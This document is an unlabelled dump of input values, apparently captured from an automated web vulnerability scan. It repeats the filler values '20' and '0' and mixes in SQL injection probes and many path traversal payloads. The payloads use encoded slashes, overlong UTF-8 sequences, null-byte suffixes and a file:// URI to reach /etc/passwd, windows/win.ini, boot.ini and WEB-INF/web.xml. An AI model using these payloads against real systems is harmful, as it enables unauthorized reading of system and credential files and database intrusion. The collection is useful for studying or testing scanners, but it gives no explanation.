20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

0

0

0

0

0

0

0

0

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

0

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

-1" OR 2+351-351-1=0+0+0+1 --

1

20

20

-1 OR 2+698-698-1=0+0+0+1

20

-1 OR 2+213-213-1=0+0+0+1 --

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

WEB-INFweb.xml

20

WEB-INF/web.xml

20

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\./.\./.\./.\./.\./.\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

................windowswin.ini

20

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

20

../../../../../../../../../../windows/win.ini%00.jpg

20

../../../../../../../../../../boot.ini

20

../../../../../../../../../../windows/win.ini

20

20

WEB-INFweb.xml

20

20

/WEB-INF/web.xml

20

20

WEB-INF/web.xml

20_9027

20

/../../../../../../../etc/passwd

20

file:///etc/passwd

20

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

20

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

20

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

20

/.././.././.././.././.././.././.././../etc/./passwd%00

20

20

20

%2fetc%2fpasswd

20

20

/etc/passwd

(select convert(int,CHAR(65)))

20

20

20

.\./.\./.\./.\./.\./.\./etc/passwd

20

/../..//../..//../..//../..//../..//etc/passwd%00.jpg